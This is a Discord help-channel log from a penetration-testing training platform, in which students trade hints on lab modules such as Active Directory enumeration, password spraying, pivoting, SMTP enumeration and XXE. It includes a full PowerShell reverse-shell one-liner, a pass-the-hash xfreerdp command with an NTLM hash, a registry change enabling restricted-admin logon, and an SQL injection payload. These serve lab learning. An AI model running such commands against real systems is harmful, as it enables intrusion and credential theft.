#modules

with json files inside...I tried copying and pasting the json files individually, but bloodhound put up errors when I tried

since I never had the issue to trasfer any file from the pwnbox to my local machine, does the pwnbox go over the intenet? Can use any hosting file transfer?

I tried wetransfer and another site like that, but the zip file I get is about .2 MB smaller and bloodhound rejects it

did you check the hash before and after the download?

They look the same

This is what I get in bloodhound

The naming convention hasn't been changed, however, the different versions of bloodhound and sharphound can affect this

I used whatever version of bloodhound-python that the pwnbox has to get the zip file...would it work if I tried some other tool to get the zip?

As long as the versions "match" there wouldn't be an issue

Additionally, you can try with https://github.com/szymex73/bloodhound-convert

That worked! You are awesome, @autumn pilot Thank you!

anyone having issues with the xss module? im trying to connect to the phishing targets but i only see them down

nvm got up right after this post

dead

back down ffs

Can someone help with a hint for the question "Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain. " in Active Directory Lab 2. I know I have to use ||DomainPasswordSpray|| but I only have 1 password ||w****|| and the tool just gives me a hit on my already known user ||A****|| I have enumerated for other passwords and have dumped the ||SQL service hash|| just can't crack it. Is there another cred I was supposed to find? Been stuck for 3 days now....

Did you try the weak common passwords shown in the module?

I haven't I have been re-reading the module on this part and can't seem to find that? Thanks for the hint, I just can't find this part in the module you have been refrencing.

Could you explain it to me?

It's mentioned in multiple places - the intro to password spraying, password spraying from Linux, from Windows

ahhhh I get you, now .

Thanks

hi

hey

Do You know which command to use?

you can use a simple for loop for that

help me with that.

or something like that (assuming it’s a linux machine)

it's windows cmd

go in the documents folder and try the command tree .

and then look for the flag

i tired that there are so many dir and flag.txt

need to get content of all files in one go, is there any cmd?

idk

what type of shell do you have?

power shell?

windows command line

Thank You.

Do you guys also download the cheatsheets from the modules and get an Defender error?

I have the problem, that my Windows Defender marks them as Thread:

"Backdoor:PHP/Remoteshell.F"

Is this because defender reads the file content and finds a suspicous line of code?

Yes it’s always the PHP webshell one liner lol, just make an exception

Yes, you need to add a file/folder exclusion to defender

Thanks!

Hii, would someone please be able to help me with an academy module?

just ask your question, which module, which section, what have you tried

Doing the Windows Event Logs and Finding Evil Module, it asks to find the executable in the Event Viewer in the very first question. I am unable to find it correctly, not sure if I'm doing something wrong but I navigated to the correct event id and time and cannot seem to find the correct executable name

This is a good hint ^

Ahh got it thanks, I messed up and set my filter to only have 4624 events 🙂

Module : Attacking Common Services
Section : Attacking SQL Databases
Question : What is the password for the "mssqlsvc" user?

can someone help me with hashcat, i found the hash of 'mssqlsvc' with responder and used hashcat but it gives me a wrong password
hashcat -m 5600 -a 0 test.hash /usr/share/wordlists/rockyou.txt

with john i cracked it instantly

||princess1|| ?

yeah i just did it and found it

yes its that pass

i can’t make hashcat works most of the time idk

me too its so annoying

need a cracking rig 🤣

never had an issue with hashcat, idk what the problem might be

i think it's with the cpu i cant use it in my parrot machine but i can in my kali i dont know why

you can just use hashcat on your host

Ya do everything except hash cracking from VM, i run a 4080 natively and smash through wordlists w hashcat

do you need cuda toolkit?

i have a 3070Ti

but for everything i have done in this field i have never needed hashcat tho in the next modules you use it

honestly, I don't bother running it on my host for CTFs, since it's meant to crack quickly by design, but if you get any issues, that's a good way to avoid them

also do you build from source?

There’s pre-built binaries

ikik

i think also getting from github code can lead to some errors since its a development branch

does it work out of the box in Windows apart from installing CUDA toolkit?

Yeah

nice then

thx

Bro have you been cracking from a vm?

i only had to crack for CTFs and HTB boxes

Dude haha, download hashcat rn and start using it. With a 3070ti the difference is next to none

Even for CTFs

using JtR from my Parrot Vm always has been enough

never took more than 30 seconds

also i have a 5800x maybe that helps 🤣

that thing is hot tho

I have a question for the module Advanced SQL Injections in the section Error-Based SQL Injection.

';SELECT%20CAST(CAST(QUERY_TO_XML('SELECT%20*%20FROM%20USERS%20where%20id%20=%2010',TRUE,TRUE,'')%20AS%20TEXT)%20AS%20INT)--%40bluebird.htb
With that statement i get all the info for the user
How do i get the CODE for the reset?

In this module
https://academy.hackthebox.com/module/67/section/606
What information does crackmapexec provide us?

I don't know how to get the flag. I've not been able to crack the Administrator NTLM hash with either Hashcat or Crackstation. Any suggestions ?

I haven't done the module yet but it doesn't look like you need to crack it, just to follow the section, escalate privileges and read the file

Thanks, even with the elevated privileges, I still can't access the flag

Strange, what if you navigate to it manually via GUI? Or try to cat/type it out

you can try to use takeown or since you are an administrator you can "DCSync" most probably then get the hash of the "local administrator" log in, and get the flag

I get PermissionDenied Unauthorized Accessexception with both the Windows Explorer and cat and type in PowerShell.

Hi Guys I am stuck on "Linux Privilege Escalation - Miscellaneous Techniques", I have root privilege but unable to find flag

Can someone please help

read the #rules keep spamming shit like that and you will get the 👢 up your ass

The only other option is to pass the hash with xfreerdp

So instead of using a password to log in with xfreerdp I would use the NTLS hash I got from secretsdump.py?

hi i'm doing the crypto challenge secure signing would like to know if it's appropriate to ask if i can dm someone for a hint / if im in the right direction? I have a partial flag and some python code so far. If it's not appropriate thats ok as well 🙂

this channels is for HTB academy modules read #welcome and #rules after that use /verify at #bot-commands and ask that at #challenges

thank you 🙂 haven't verified yet will do now much appreciated

Yeah, make sure to add the appropriate registry key so PtH can work

Thanks, which is the appropriate registry key?

no need to overcomplicate things, even the simplest manoeuvre can make an effect

no hashes, no dumping and etc is necessary

It was taught earlier in modules when discussing PtH attacks, if you're not doing things in order, Google can help

I tried like this:

xfreerdp /v:10.129.43.42 /u:Administrator /pth:||7796ee39fd3a9c3a1844556115ae1a54||

i get

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

try psexec or the above 👆

I get an Access is denied

Is there someone I can DM about the Enumerating ColdFusion section of the Attacking Common Applications module? This is third day that I have tried loading the target and navigating to port 5500, but I keep getting timeout error messages. I'm hoping someone can help me make progress without having to navigate to <IP>:5500

run the cmd as admin

ig

I ran it from a Command Prompt that had been started with "Run as Administrator:" It says Administrator: Command Prompt at the top.

Is there another way to run the reg add command as admin?

At this point it sounds like there's something wrong with the instance, because as soon as you escalated to local admin, you should be able to access everything

I had a similar problem on the target for the Dns Admins Privilege module. Even though the system said I was administrator I couldn't execute any commands as administrator. I had to get the DNS server to execute a reverse shell for me in order to get the flag.

You are unnecessary overcomplicating things

Ok, thanks. How do you think I should proceed ? 😀

since you are modifying the access token of the user a certain action needs to be done that is the most simplest thing that a user can do, whenever his groups/privs have been changed

Ok, thanks, I'm not sure I understand the relevant security mechanism interactions. What is the certain action that needs to be done?

https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc783557(v=ws.10)?redirectedfrom=MSDN

Haha, so you are saying I need to log out and then log back in 😝 ......Ok let me try........

So for second question in the shells section , when I 'rdp' into the target machine , is there suppose to not be any internet connection?

https://academy.hackthebox.com/module/115/section/1106

target vms are not connected to the internet

So the exercise doesn't require an internet connection for the target VM machine?

why would it?

Thanks, that worked. I will definitely add that to my list of mistakes "Not logging out and then back in after executing a Windows Privilege Escalation" 😝

sometimes the most simplest action is the key towards the solution

funfact: im currently in a different "Windows Privilege Escalation" section and after succesful escalation i couldnt access the file... was about to ask here but read your post, though "meh, give it a try" and... yes. 😄 thx for your help

is there a feature to get machines based on modules i have completed so far

on the "completed" pages for modules is a list of machines

i mean machines with modules i have completed so far

if i see the ones on completed pages, they require additional modules that i have not completed so its hard

i think they are currently building something the other direction: on machine info cards is a "Machine Info" tab where sometimes is a list of "Related Academy Modules" see https://app.hackthebox.com/machines/Popcorn/information

but i think this requires a ton of classification work - so maybe this is a future feature

oh okay

thanks

Module name : Attacking common Services
Section name : Attacking DNS
Question : Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.

i did a subbrute and found 4 subdomains of inlanefreight.htb but i dont know where to go someone can give me a hint?

what can you do when it comes to DNS?

the module tells you

Gain a shell on the vulnerable target, then submit the contents of the flag.txt file that can be found in C:\

how to do it

I have tried for it so many times

which section, which module? we don't automatically know

msf can‘t work

do host but it gives nothing

what else

SHELLS & PAYLOADS

dns spoofing

and takeover

Infiltrating Windows

not with a non-existing domain, what else?

model: SHELLS & PAYLOADS name Infiltrating Windows question : Gain a shell on the vulnerable target, then submit the contents of the flag.txt file that can be found in C:\

I can dig zone transfer

the module basically walks you though it

exactly

i tried but i need the ip of the subdomains for that?

I know use msfconsole ,but nothing happen

how to do it

and i dont have them

the IP you use in the command is the IP of the machine you spawned

i'm the dumbest of all ahah, thanks i found the flag

anyone able to give me a hand with install tplmap? I keep running into issues

try python <3.9

i have this in my note for the pwnbox

git clone https://github.com/epinna/tplmap.git;cd tplmap
virtualenv -p python2 tplmap
source tplmap/bin/activate
pip install -r requirements.txt

I tried that, never works

do not use tplmap xd

you can enumerate SSTI manually 99% of the time

https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection

just checked my install: with this changes in core/plugin.py & checks.py i can use it with python 3.9

Hi , For the question 'Connect to the target via RDP and establish a reverse shell session with your attack box then submit the hostname of the target box. ' of the Reverse shell section of the 'shells and payloads' module(https://academy.hackthebox.com/module/115/section/1106) , I been executing the command 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.210',1337); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535 | ForEach-Object { 0 }; while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); $sendback = (iex $data 2>&1 | Out-String); $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '; $sendbyte = [System.Text.Encoding]::ASCII.GetBytes($sendback2); $stream.Write($sendbyte, 0, $sendbyte.Length); $stream.Flush() }; $client.Close()"' on the Windows target that I RDP'd into.

When I executed the above command, I generated an error. I tried removing extra white spaces found in syntax in the code, using chat gpts suggestion for the error, copying the code into a notepad document before copying it into clipboard and I still generate errors. I am now at a loss on how to resolve this error.

that command is run from the command prompt, not from powershell

are you saying that I SHOULD run it from the command prompt or that I am currently running it from Command prompt

nevermind, Itried it

is it working now?

Yes. strange that that powershell command wouldn't work in the powershell prompts

because the command itself starts powershell

if you remove the first part powershell -nop -c along with the quotes surrounding the command, it'll work from powershell

oh okay

hey guys where can i talk abt htb machines?

like i need some help

read #welcome and #rules after that use /verify at #bot-commands and ask at #boxes

btw i tried using the identify thingy it isnt working

did you try #bot-commands message ?

yeah

but it's giving me an error

ping a mod with the error

okay

Hello folks, anyone managed to finish the File Upload Module ? Stuck in the "Type Filters" section, able to upload file, but no execution.

am i supposed to get this working in the exercise?

or is this just for demonstration?

would like to finish the module today as well as another one since my exam voucher expires tomorrow.

the majority of the time, windows will block ping, so yes, can you scan it is the question?

ok this is not working because i think the path for submitDetails.php is different from /var/www/html, but the question now is: is this an erratum or intended?

i know it is not working for that particular file because i can read the one needed to pass the section

can someone double check?

Hey Guyz, i'm currently doing the

Pivoting, Tunneling, and Port Forwarding
RDP and SOCKS Tunneling with SocksOverRDP

But it ask me to upload a dll to my windows machine. When i try to do it by rdp windows tell me that its not possible cause it might be a virus. I tried to zip it and send it, it works but when i extract the zip the dll file is delete after few seconds

Dont you have to serve some of them lines over HTTP

ill grab my notes up

i did of course

as i said i could solve the exercise

but is weird because the CDATA method is supposed to show ALL files without exception

and yes the /var/www/html/submitDetails.php is the correct path

works

does not work

what happens if you change it too ./submitdetails.php

it crashes

weird

should work

Can you still read the file if its base 64 encoded?

haha literally crashed the web server

yes i can do it with the base64 method xD

very weird

im asking for the CDATA method

yeah wasnt sure if it was a box issue or CDATA

it is w.e. maybe the module creator can shed some light

or any web expert around here

i mean check this, in the module instructions it is indeed working

what happens if you put the %xee in the email box?

actually that wont work will it

no you have to place the entity defined in the evil.dtd file

yep misread it

not sure then

i mean i can read php file

without problems

just not that one haha

has to be some DOS protection

self reference makes sense

but i cannot read the passwd for example

HAHAHAHA

while i can read the hosts

its working now?

no

is a different route

ah yah the base64 one

its the /error page

working on the module for C# and I have a ridiculous question... I cant figure out what the question for the array section as I dont know what is 'exactly' asking for. this is very hard to ask about with out risking a 'spoiler' . The question states How can you access the element in the third row and second column of a two-dimensional array named grid in C#? using the example given above in the Console.Write(matrix[i, j] + " "); I have tried to mimic coding convention in the example with the trailing spacing after the comma and and format shown for the matrix variable. I also tried among trying swapping what I believe to be column and row, removing the trailing space, adding others, etc. I dont know what pattern it is looking for. Maybe the question would be better if it was Write a line of code to set the variable 'foo' equal to the row m and col n of the array bar using code conventions shown above answer foo = bar[m, n];

noo the /error

honestly no idea haha

+1

i wont sleep today i think

it seems this is what is happening but this is not documented in the module

i think we need an erratum

both passwd and submitDetails.php contains weird symbols (?)

Hi, I am currently in the network enumeration with nmap module. I was going through the firewall section I am a bit confused to the DNS proxying part in the example why are they specifically using port 50000?

Module name : ATTACKING WEB APPLICATIONS WITH FFUF
Section : Sub-domain Fuzzing

is it only me or the question has changed recently

is that a random port or something calculated?

has to be only you

the hint has nothing to do with my answer

i did the module a month ago

my answer is *.inlanefreight.com

not me

it changed then

its *.hackthebox.eu

oh ok

that domain does not exist anymore i think

it redirects you to hackthebox.com

old times from hackthebox.eu xD

old and good times

xd ok i thought i was insane for a moment lol

Looking for help finding tools- I am in the HTB academy fundamentals module Documentation and reporting lab. I've already answered question 1 but it seems based on the documentation I will need to use Rubeus/mimkatz to answer the next couple questions. Can anyone point me in the right direction to find these tools in the lab?

send the link of the section

https://enterprise.hackthebox.com/academy-lab/4052/4696/modules/162/1535

this is not here i think

we dont have access to enterprise

contact your local instructor

i asked coz we dont even have a "HTB Academy Fundamentals" module

do mods even reply here?

Hello! I am new here, and I am just curious, are the HTB certs the best certs or are there more relevant certs to get for pen testing? (No disrespect, I am just not knowledgeable)

Or what is a good start to getting into it? (Aside from A+, Sec+, Network+)

They don't actively monitor channels, what's your issue?

the identification shit aint workin

For getting a job, no, for getting knowledge, yes

The CPTS path is useful for CPTS

No, anything that's in that path and not in CPTS path is not relevant to the CPTS exam

hey i currenlty on Credentials in Object Properties. I create the script as SearchUser.ps1. i ran the script in powershell and nothing happend. what i'm doing wrong, can u assist?

You need to load the script into memory first

Any good resource recommendations for studying?

Thanks!

cool script to exfil data throuhg XXE out of band

What path are you talking about? I cannot find where to begin

<@&861185840277487616> check his bio

Ty @analog dock

You’re welcome

hi guys i am stuck in footprinting dns last question can anybody help please?? What is the FQDN of the host where the last octet ends with "x.x.x.203"?

Enumerate more

please dm

Subdomains of subdomains

For what?

i am stuck there for 4 hours

I gave you a hint here

ok so a subdomain of inlanefreight.htb

There's really not much else to nudge for

of subdomain double it

ok thank u i will check that

Your answer will be a.b.inlanefreight.htb

sometimes the answer is infront of us and we dont see it

i tried something like this and didnt work

As stated in the hint that's given to you by the module: wordlists often have different words

So start small go bigger when trying different wordlists

i tried top 5000 and fierce

use the fierce wordlist in the dns enum tool

didnt show me the result i need

it may be you’re not querying the right subdomain

^

😉

If you're not finding the answer maybe try something different

You'll need to use dnsenum on the subdomain.inlanefreight.htb

i tried them all this is the problem

no you didnt

or youd have had the answer

^

didnt find .203

i found .201

What does your command look like

dnsenum --dnsserver 10.129.79.194 --enum -p 0 -s 0 -o subdomains.txt -f /usr/share/wordlists/seclists/Discovery/DNS/fierce-hostlist.txt inlanefreight.htb

tried also ns.inlanefreight.htb

and others

wordlist110000

5000

Fierce is correct

the domain?

You must have skipped over a subdomain

internal.inlane

You're missing one

app

Your messages are being deleted as they contain spoilers btw

By a mod, not me

Unless you did

no not me

I'm not telling you which one you're missing in your list. Do a simple zone transfer to inlanefreight.htb

i had found like 8

so i need to dig axfr inlane

And see if you're missing a subdomain you haven't used dnsenum on

you need to. enumerate more

there is a helpful graphic in the section of the module

take the time to understand it

i checked dev i checked many

i will check the graph thanks

i already checked ws01

Its not about checking many

check all of them

found it

ALL

hello every one, anyone who knows about ligolo-ng?, to ask some related to pivot module

congrats

thank u

http://dontasktoask.com

was tricky because i did run this command but it make error so i cancel this time after i read the graph i left it to see and it run i saw 1st host and i left it more

LoL @thorn urchin ok., here we go.....

Patience is key in this field

the ligolo-ng fans grows daily

It's not a cult, trust

my double pivot is established, BUT can't ping to what I think is DC01 (172.16.6.25)

yea well i am trying to do the modules for cpt learning pentesting path so its a little bit different and the notes is amazing

the information is amazing all have to be noted

I'm also doing thus path, the module that really tests patience is password attacks

mmm i will check it out and tell u about it 😄

Don't

Lol I already know

oh god i know it

i done zephyr i face all of them

You're basically forced to wait for the tools because you're given a custom wordlist to mutate and run against the targets

almost

why did you start the first session, switch to a second session, then switch back?

you have to be on the session that has access the subnet you want to target

also dont forget to add the new route for the new subnet

that route is already added...

why you ... me

yea but sometimes u should make it for example run as tail

to start from bottom

I gave two big pointers for why it could be not working

if you insist one of the two big points are fine, then address the other one

I would suggest not lol

both the route and the correctly selected session need to be active at the same time

Currently on the Password attacks\PtT . I've found the hash for the workstations but having some trouble cracking it. Any that can point my in the right direction. Have tried both Hashcat and John without luck

also do you KNOW that the DC is on the IP or just guessing? And have you interacted besides just ping? because most windows machines ignore ping

Use the right wordlist? My notes on that module are a bit shit

Also which pass the ticket: windows or linux

linux

^^

have tried both rock you and the mutated one pased on the resources in the exercices

from Pivot-SRV01 I made a ping sweep and found 172.16.6.25 alive, that's why I'm guessing is DC01...!!!

if I understood correctly, I select the session thru 172.16.60/24 inet and is not working either

b

Did you also try the tool shown in the section?

can you humor me by issuing the ifconfig command from the pivot session and sharing the results

dont happen to remember what -m you used for AES 256?

I'm referring to the web tool if you scroll up on that section

yeah that didnt work

hmm okay.

try just doing a crackmapexec smb 172.16.6.0/24 sweep

Then you can Google hashcat modes I forget the flag in hashcat to use

Hi, I am currently in the network enumeration with nmap module. I was going through the firewall section I am a bit confused to the DNS proxying part in the example why are they specifically using port 50000? I tried running the command
nmap -v -sV -p- -Pn -n --disable-arp-ping --source-port 53 -oX freshTCP.xml 10.129.2.47 but the scan takes more than 5 hours and by the time it finishes the machine expires. Please help I am stuck in the last ips hard box.

Hi , anyone here is solved sau machine ?

another fulk gave me a hand, starting the session was what I missing

you mean that thing I told you to do at the beginning? lol

now I can reach 172.16.6.25

dope

Do -sS

That's literally the only difference

If you take out the given port

I tried that and sA but when I am trying on all the ports it takes an absurdly long time

you mean this -> why did you start the first session, switch to a second session, then switch back?

I did almost all of them

yeah, you gotta be using the correct session

ok., maybe I misunderstood an output, cuz I guess I ran the start command and received an message the session was already started, but maybe I'm wrong, but thank you btw

You don't need the -sV flag

tried without it too

the problem is when I do -p- it takes an absurdly long time like 7 to 8 hrs

and I do not get any result

even when I try T 5

at which point I get blacklisted

I have a good internet conn too

the problem is not only with the last box but all the boxes in that module

you can try dividing the port range into manageable parts (-p1-10)

lol I used the wrong kt file

Used the one referred to in the script... can now see there are one more

facepalm

it still takes a lot of time to do from 1-100 like around 10 mins for a -F scan

Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.

any metasploit or wordlist to use?

That sounds like a local network issue then if it's being that slow

I use the eu vpn cuz i am from india

should I try switching to different zones?

Local, as in your own internet

I get around 100Mbps here

That's honestly not a whole lot. But it could be that the packets are being filtered by your isp. But don't really know, the vpn region shouldnt be the issue

the word list to use was already provided in the module

any idea how can I speed it up?

Well if it's your isp, not much you can do there

Are you using a vm?

yes what if i use the pwnbox?

you should try that

Stop your vpn connection on your vm and test in pwnbox

ok I will do that thanks for the help guys

pivot skill assessment is pretty unstable or I'm the only one who is suffering with it...!!!

found nothing

nmap 10.129.79.194 -p25 --script=smtp*

none of them worked found 10 and used them didnt work

same as nmap 10.129.79.194 -p25 --script=/usr/share/nmap/scripts/smtp-enum-users.nse

hint: look at the hint

😉

mmm

enum username

Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.

Eh

it worked thanks again @fathom pendant @lusty thicket

smtp-user-enum script I find is better to use to not have to use Metasploit tbh

any idea how do I import the scan files from pwnbox to my vm?

cuz if I use http server on pwnbox I cannot use the vpn from my vm

try using base64

Need some help from the community, particualry those who are good at assembly code! I'm stuck on the Intro to Assembly language module, I find the module to be extremally complex, and the language quite hard to understand. And I'm only halfway so will likely return here for help....

Currently, I need to modify this code (mov rax, 5) so that it will not loop. I then need to find the hex value that prevents the loop. Here is the code I am to edit:

global _start

section .text
_start:
mov rax, 5 ; change here
imul rax, 5
loop:
cmp rax, 10
jnz loop

i did it gave me a list i tried all nothing worked

Yeah and Metasploit is often a crutch tbh. I honestly avoid msfconsole unless told to use it

I am going sequence manner in the cpts path I will look into the module once i get there

Thanks for the suggestion

did you look at the hint?

employee name

On systems usernames are often named after the employee's name. We recommend to use the Footprinting-wordlist provided as resource. Remember that some SMTP servers have higher response times.

the part about smtp servers having different response times

mmm

play with the timing a bit

min rate

timing

how

the smtp-user-enum tool works for me

it worked and gave me users

Well with the smtp-user-enum tool doing like -W 15 seems to be the sweet spot

gave me 10 users

10 valid users?

| root
| admin
| administrator
| webadmin
| sysadmin
| netadmin
| guest
| user
| web
|_ test

nmap 10.129.79.194 --script=smtp-enum-users -p25

Eh

You can use the script as a standalone

just use the smtp-user-enum tool man

Not in nmap

don’t you need to provide a wordlist as a script argument?

Because in Nmap iirc you have to mess with the --script-args={option1,option2,option3,option4}

"Broken Authentication" -> "Predictable reset token" I have done most necessary steps to generate tokens but I think my timestamp is messed up. I don´t want to spoiler others so possibly anybody able to help me could DM 🙂

rockyou?

Which is far more painful (doable)

Sirg

i didnt see

the wordlist already provided in the resources section

Read the advice we're giving you

Use the smtp-user-enum as it's own command/tool

bloody hell

now i saw the wordlist

hi. Can someone help me with a hint for Session Hijacking? I am not getting any cookies or cookies.txt. Am I supposed to put my vpn IPaddress in the index.php? I have tried the target's IP and mine so idk what I am doing wrong.

i didnt know that we can use from there

Generally you start with that wordlist and move to others if it doesn't work

anybody 🙂 ?

yea sorry didnt know that there is a button there to download first module lol

server hosted in eu

i have to convert time? bruuuuh

Almost every module provides

You can just search "predictable reset token" in the discord search and you'll see the nudges other people got if you click their message

ah ok

Like you can get lucky with it

getting started module, Nibbles Web FootPrinting

Now we are starting to get a better picture of things. We can see some of the technologies in use such as HTML5, jQuery, and PHP. We can also see that the site is running Nibbleblog, which is a free blogging engine built using PHP.

http://10.10.10.75/nibbleblog [301 Moved Permanently] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.10.10.75], RedirectLocation[http://10.10.10.75/nibbleblog/], Title[301 Moved Permanently]
http://10.10.10.75/nibbleblog/ [200 OK] Apache[2.4.18], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.10.10.75], JQuery, MetaGenerator[Nibbleblog], PoweredBy[Nibbleblog], Script, Title[Nibbles - Yum yum]

am i blind? where is the php ?

oh i get it..

phpsessid

smtp-user-enum -M VRFY -U '/home/kali/Downloads/footprinting-wordlist.txt' -t 10.129.79.194 -p25 -v

Well yes but iirc if you do like -a3 or one of the other flags shown it should give you a broader picture

O.o 0 results

Try change the -W to 15

@fathom pendant Thanks, got the flag now. Also such a useful tip with the past message search, will do that more often before asking here.. Finally I can go to the gym, I thought I would spend the whole evening here xD

Don't recall

look at the help page -h —help

what is EXPN?

Not needed

i did bro

yes

spoiler btw

It can also depend

Some can be set up as blackholes that accept any email/domain and return a positive status

i didnt see the spoil ;p

Like "yes your email did happen, but really it didn't"

The command used

Oh you're being cheeky

Examples:

$ smtp-user-enum -M VRFY -U users.txt -t 10.0.0.1
$ smtp-user-enum -M EXPN -u admin1 -t 10.0.0.1
$ smtp-user-enum -M RCPT -U users.txt -T mail-server-ips.txt
$ smtp-user-enum -M EXPN -D example.com -U users.txt -t 10.0.0.1

i used first one

deep breath

Honestly how tf did you get hacker rank if you don't know the basics

you need to look at the -h —help page to see how the options work and the command usage

finally

man everything is okay but idk smtp-user-enum

i used metasploit

Commands aren't always instant, we're forcing it to wait a certain time between attempts

provide the wordlist there

and run it

Metasploit is a crutch tbh

you need to try without metasploit

it worked fine when smtp-enum-users didnt

i will try it again

it’s supposed to

You may need to mess with the -W timing

What's the -d for?

debug

You don't need that flag there

it wont change nothing

ok trying without

0 result

try timing 30?

try timing 10

honestly I never got smtp-user-enum to work in that section, would be curious to know what would make it work

######## Scan completed at Thu Oct 5 16:20:48 2023 #########
0 results.

i tried 15 i tried 10 i tried 30

i tried 5

crutch better than nothing

😄

Taking breaks usually helps to enhance your understanding and concentration about a problem

Rushing through sections or exercises is something that do not recommend doing

This is not a sprint, you won't get bonus points for faster solves and etc

probably

check your command syntax

no sprinting the machine have error i already solved it using metasploit

syntax is okay just rebooted the machine to see

works after reboot?

no

syntax is fine i checked cheatsheets and some articles

i changed command many times and nothing worked

The timeout flag is lowercase w

Lol

everything you need is in the section on SQL databases, have you tried everything?

great

it worked now

man it worked alone -.-

i keep trying and reseting lab

and removed -p 25 and -v

i use only target and -w 15

I've tried everything I can think of. I've used different ports, used a different name for the file instead of script.js, reset the target multiple times. The index.php isn't getting called. Does anyone know why? I'm in Session Hijacking

I've read through the hackthebox forums, previous discord messages, and googling

did you add it to /etc/hosts

yeah, hopefully that fixes it, 'm pretty sure you could access both http and https

I'm kind of confused about the second question in the footprinting module about mssql because i believe i have listed the non-default database and I assume that I should see some kind of a flag but don't. Any help?

I'm not kidding whatsoever.

also i can't post a picture for some reason

Module name : Getting Started
Section name : Privilige Escalation
with sudo -l got a user2, but cannot get a root, tried upload with http.server a linpeas,sh but looks like there is firewall, how to do it??? please help!!

contact a company that provides those services

This isn't a paid position by me. The government of my country, and maybe even your own may reimburse you later however.

if you know its against the rules then why ask and not just go get bent?

yeah, good luck with that

This is a very serious problem that needs to be properly addressed and immediately.

There is no more time to waste.

nobody cares

discord isnt a great place to hire lmao

Oh people do care. It's people like you that make shit worse for everyone.

something concerning a government totally calls for going to a random server for a learning platform

It's a good place to start. Especially when most others are just ignorant and refuse to accept the facts.

It's just a database name

Ok, and? I have no reason to hide. I have done nothing wrong and am a completely free man.

Shrimply just fuck off

Shrimp? Girl I could pull your mother easily.

Youre breaking the rules here so you're doing that wrong

I've probably already done it in fact. 🥱

youre offtopic too

lol "shrimply"

She was mid asf.

<@&861185840277487616> can a mod get rid of this spammer already

Some rules are meant to be bent and broken when it comes to stopping very serious criminal organizations.

Nope, there are legit channels to go through, this isn't one of them.

idc

Just go fuck off if you can't comprehend basic rules

keep the channel on topic, seems like that person watched to much CSI: Miami let him be

Module name : Getting Started
Section name : Privilige Escalation
with sudo -l got a user2, but cannot get a root, tried upload with http.server a linpeas,sh but looks like there is firewall, how to do it??? please help!!
maybe someone will help and not argue in this topic lol??

hey guys is there a reason i can't post my screenshots here?

thx

wed let him be if he wasnt spamming the channel with his innane bs lol

yes, read and follow #welcome

Check what user2 has access to

thanks

for X amount of time he won't be able to send messages 😉

but how? i cannot upload a linpeas, and for sudo -l there must be a password, that i do not know

you don't need linpeas

Just look around

well ok thanks guys ❤️

feels like a half measure but I guess we will see when his times up

unless discord somehow messes it up

sheesh, I passed the Skills Assessment put cant get the session hijacking section to work

Hint: user2 can see a directory that it probably shouldn't be able to

Pspsps dm

maybe you need to modify iptables to allow access to that port🤷‍♂️

oh yeah i saw, /root/.ssh and i saw a private key, pasted it on my local machine, chmod 600, and tried to ssh but there is error:root@94.237.53.115: Permission denied (publickey).

did i done something wrong?

did you

thanks, idk why but it finally worked just now

I usedport 3333

what's your command?

ssh root@94.237.53.115 -i key

Add the port

oh well thank you very much ❤️ it worked

boi what happened above

Pls fix the xss module

skill issue

Guys do you rather learn by "Starting Machines" on htb and then move to academy

or academy htb -> Starting machines

Cuz those starting machines are also with Guides

thaks i got it

hello guys in ad enumeration module Kerberoasting - from Linux i have thiss question What powerful local group on the Domain Controller is the SAPService user a member of?

i have the password and a user and i can authenticate to the smb dc

how can i know which group im memeber of

so, follow the instructions to enumerate

can i do thats using crackmap

never mid

i was forgetting the s

Hi!

i am Doing the living off land module in AD. Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer. i have problem with this question. I managed to list all the disabled users but no flag

can someone give me a sanity check?

my syntax were

i just did it

btw

can u send the cmnd u used

yes

Import-Module ActiveDirectory

i used dsquery

I wouldnt use the object category or object class personally

id have to double check if the ldap rights there is correct though

u didnt add the flag for the admin rights no ?

and u didnt add description

that too, thatd give you a list of users, youd then need to parse their description

unless you were using ldapsearch instead

and the question was like he need to have admin rights so i added (adminCount=1)

i did this

it shows just the beginning of the flag

add this

it worked

with this

hey guest quick question I'm working on the nmap room and doing a vuln scan on the host do I just pick one of the vulns or should I use searchsploit on the apache server version

I thought it just me 😦

has anybody had this problem? I rebooted and still not able to click the link. It just started happening out of the blue. I even spawned/clicked the link from windows to copy over the IP address but it just hangs anyway.

Help me too if you solved q3 please

Which section

Just completed my first hack. Pretty cool. I like it.

hey did you solve this ? i think that i'm loosing my mind. I filtered by 4771 checked all the targetsid and nothing works

Still working on it. Haven’t. Figured it out as yet

section 8

it wants me to find the vulnerable service using the scripts I checked the hint and it said web server so I figure the apache server on port 80 and it gave me a huge print out do I need to just choose one of those vulns.

Try a different browser

thanks, it works in LibreWolf but like what happened to my Firefox? I updated it too.

I’d clear your cache and everything or try in incognito mode

thank you, I totally forgot about that man. The cache!

it works now

Sweet. Good to hear

look at the hint

Section name is more helpful than number for me to look over my notes

Me going through all of Vautia's Modules
Contents are insane and crazy challenging. Thanks you (someone mention him if he is on discord)

i got the answer, if your still interested let me know

how do i paste a screenshot here?

the instructions to verify your account are in the #welcome channel

thanks

ok so im in HyperText Transfer Protocol (HTTP) module in the very first question and the flag is in this file '/download.php' , the target is Target: 94.237.49.11:30792 so the command looks like:

but as you can see in my ls the /download.php file is not there, what am I doing wrong?

i think the command should be like curl -s -o download.php “http:ip:port/path”

ok, let me try

i did it like that due to the cheatsheet:

Just do wget

